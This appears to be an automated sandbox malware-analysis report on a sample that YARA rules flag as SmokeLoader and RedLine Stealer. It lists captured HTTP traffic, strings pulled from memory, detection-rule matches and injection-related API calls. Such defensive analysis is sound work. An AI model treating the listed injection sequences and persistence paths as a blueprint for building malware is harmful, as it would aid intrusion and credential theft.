Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:04:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:04:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:04:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:05:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:05:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:05:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:05:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:05:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:05:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:05:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:05:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:05:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:06:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:06:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:06:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:06:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:06:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: explorer.exe, 00000002.00000000.2237496899.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2237496899.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000002.00000000.2237496899.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2237496899.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000002.00000000.2237496899.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2237496899.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000002.00000000.2237496899.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2237496899.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000002.00000000.2237496899.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000002.00000000.2234479094.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2231041832.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2234452297.0000000007B50000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000002.00000000.2242095283.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000002.00000000.2238006366.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000002.00000000.2242095283.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000000.2237496899.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000000.2237496899.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/I
Source: explorer.exe, 00000002.00000000.2237496899.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000002.00000000.2237496899.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2237496899.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000002.00000000.2237496899.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
Source: explorer.exe, 00000002.00000000.2242095283.000000000C070000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com-
Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
Source: explorer.exe, 00000002.00000000.2242095283.000000000C070000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.come
Source: explorer.exe, 00000002.00000000.2242095283.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comEMd
Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000002.00000000.2238006366.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/e
Source: explorer.exe, 00000002.00000000.2242095283.000000000C070000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comM
Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000004.00000002.2509117152.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2253666122.0000000004A91000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2509592030.00000000047A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2253580579.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000004.00000002.2509060579.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.2509117152.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2509007784.0000000002C0D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2253666122.0000000004A91000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2509592030.00000000047A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2253380086.0000000002C1D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2253563669.0000000004790000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2253580579.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR	Matched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401514
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	0_2_00402F97
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401542
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,	0_2_00403247
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401549
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,	0_2_0040324F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,	0_2_00403256
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401557
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,	0_2_0040326C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040327D NtTerminateProcess,GetModuleHandleA,	0_2_0040327D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014FE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,	0_2_00403290
Source: C:\Users\user\AppData\Roaming\fbtdajh	Code function: 4_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401514
Source: C:\Users\user\AppData\Roaming\fbtdajh	Code function: 4_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	4_2_00402F97
Source: C:\Users\user\AppData\Roaming\fbtdajh	Code function: 4_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401542
Source: C:\Users\user\AppData\Roaming\fbtdajh	Code function: 4_2_00403247 NtTerminateProcess,GetModuleHandleA,	4_2_00403247
Source: C:\Users\user\AppData\Roaming\fbtdajh	Code function: 4_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401549
Source: C:\Users\user\AppData\Roaming\fbtdajh	Code function: 4_2_0040324F NtTerminateProcess,GetModuleHandleA,	4_2_0040324F
Source: C:\Users\user\AppData\Roaming\fbtdajh	Code function: 4_2_00403256 NtTerminateProcess,GetModuleHandleA,	4_2_00403256
Source: C:\Users\user\AppData\Roaming\fbtdajh	Code function: 4_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401557
Source: C:\Users\user\AppData\Roaming\fbtdajh	Code function: 4_2_0040326C NtTerminateProcess,GetModuleHandleA,	4_2_0040326C
Source: C:\Users\user\AppData\Roaming\fbtdajh	Code function: 4_2_0040327D NtTerminateProcess,GetModuleHandleA,	4_2_0040327D
Source: C:\Users\user\AppData\Roaming\fbtdajh	Code function: 4_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004014FE
Source: C:\Users\user\AppData\Roaming\fbtdajh	Code function: 4_2_00403290 NtTerminateProcess,GetModuleHandleA,	4_2_00403290

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000004.00000002.2509060579.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.2509117152.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2509007784.0000000002C0D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2253666122.0000000004A91000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2509592030.00000000047A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
